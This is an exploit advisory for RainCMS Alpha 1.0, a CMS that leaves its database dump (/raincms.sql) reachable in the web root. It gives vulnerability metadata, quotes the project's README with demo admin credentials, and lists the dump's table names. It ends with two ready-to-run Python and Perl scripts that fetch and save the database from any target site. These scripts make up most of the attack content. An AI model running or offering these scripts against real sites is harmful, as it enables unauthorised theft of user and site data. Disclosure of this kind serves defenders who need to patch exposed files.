###########################################################################
# Exploit Title : RainCMS Alpha 1.0 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 04/04/2019
# Vendor Homepage : raincms.org
# Software Download Link : github.com/feulf/RainCMS/archive/master.zip
# Software Information Link : github.com/feulf/RainCMS
# Software Affected Version : 1.0
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-538 [ File and Directory Information Exposure ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Acunetix Reference Link About => [ phpMyAdmin SQL Dump File ]
acunetix.com/vulnerabilities/web/phpmyadmin-sql-dump/
# Acunetix Reference Link About : [ Possible Database Backup File ]
acunetix.com/vulnerabilities/web/possible-database-backup/
###########################################################################
# Description about Software :
***************************
Rain is a tool to create awesome website and to manage them simply with a blink of an eye!
###########################################################################
# Impact :
***********
* The product stores sensitive information in files or directories that are accessible
to actors outside of the intended control sphere.
* An information exposure is the intentional or unintentional disclosure of information
to an actor that is not explicitly authorized to have access to that information.
* phpMyAdmin is a free software tool written in PHP, intended to handle the administration of
MySQL over the World Wide Web. It can be used to dump a database or a collection of
databases for backup or transfer to another SQL server (not necessarily a MySQL server).
The dump typically contains SQL statements to create the table, populate it, or both.
This file contains an phpMyAdmin SQL dump. This information is highly sensitive and
should not be found on a production system.
* It looks like this file contains a database backup/dump.
Acunetix inferred this filename from the domain name. A database backup contains a record of the
table structure and/or the data from a database and is usually in the form of a list of SQL statements.
A database backup is most often used for backing up a database so that its contents can be restored
in the event of data loss. This information is highly sensitive and should never be found on a production system.
Remediation : Sensitive files such as database backups should never be stored in a directory that is accessible
to the web server. As a workaround, you could restrict access to this file.
Install
-------
1. clone Rain in your WWW folder
git clone https://github.com/rainphp/RainCMS.git
2. create a database rain and import in it the file raincms.sql
3. edit the file config/db.php with the right database account information
Use
---
access http://localhost/RainCMS to navigate the website.
Administration:
http://localhost/RainCMS/admin
login demo@demo.com
pw demo
Debugging
---
Rain cache the HTML, CSS and JS so in order to see any changes on templates
or CSS or JS, you have to be logged as administrator, or even better delete
all the cache files with this command:
rm -r cache/html/* public/cache/* cache/website/* cache/views/*
###########################################################################
File :
*****
/raincms.sql
Information :
************
-- phpMyAdmin SQL Dump
-- version 3.5.1
-- phpmyadmin.net
--
-- Host: localhost
-- Server version: 5.5.25
-- PHP Version: 5.4.4
-- Database: `rain`
-- Table structure for table `block`
-- Dumping data for table `block`
-- Table structure for table `block_setting`
-- Table structure for table `block_type`
-- Dumping data for table `block_type`
-- Table structure for table `block_type_option`
-- Dumping data for table `block_type_option`
-- Table structure for table `content`
-- Dumping data for table `content`
-- Table structure for table `content_comment`
-- Dumping data for table `content_comment`
-- Table structure for table `content_permission`
-- Table structure for table `content_rel`
-- Dumping data for table `content_rel`
-- Table structure for table `content_type`
-- Dumping data for table `content_type`
-- Table structure for table `content_type_field`
-- Dumping data for table `content_type_field`
-- Table structure for table `content_type_setting`
-- Dumping data for table `content_type_setting`
-- Table structure for table `content_type_tree`
-- Dumping data for table `content_type_tree`
-- Table structure for table `file`
-- Dumping data for table `file`
-- Table structure for table `file_rel`
-- Dumping data for table `file_rel`
-- Table structure for table `language`
-- Dumping data for table `language`
-- Table structure for table `layout`
-- Dumping data for table `layout`
-- Table structure for table `menu`
-- Dumping data for table `menu`
-- Table structure for table `module`
-- Dumping data for table `module`
-- Table structure for table `setting`
-- Dumping data for table `setting`
-- Table structure for table `theme`
-- Dumping data for table `theme`
-- Table structure for table `user`
-- Dumping data for table `user`
-- Table structure for table `usergroup`
-- Table structure for table `usergroup_user`
-- Dumping data for table `usergroup_user`
-- Table structure for table `user_localization`
###########################################################################
# Database Disclosure Information Exposure Exploit 1 :
***********************************************
#!/usr/bin/python
import string
import re
from urllib2 import Request, urlopen
disc = "/raincms.sql"
url = raw_input ("URL: ")
req = Request(url+disc)
rta = urlopen(req)
print "Result"
html = rta.read()
rdo = str(re.findall("resources.*=*", html))
print rdo
exit
###########################################################################
# Database Disclosure Information Exposure Exploit 2 :
***********************************************
#!/usr/bin/perl -w
# Author : KingSkrupellos
# Team : Cyberizm Digital Security Army
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('RainCMS Alpha 1.0 Database Disclosure Exploit');
system('color a');
if(@ARGV < 2)
{
print "[-]How To Use\n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 site.com /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
($TargetIP, $path, $File,) = @ARGV;
$File="raincms.sql";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Wait Please Dear Hacker!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "D:/raincms.sql");
if ($request->is_success)
{
print "[+] $url Exploited!\n\n";
print "[+] Database saved to D:/raincms.sql\n";
exit();
}
else
{
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";
exit();
}
###########################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###########################################################################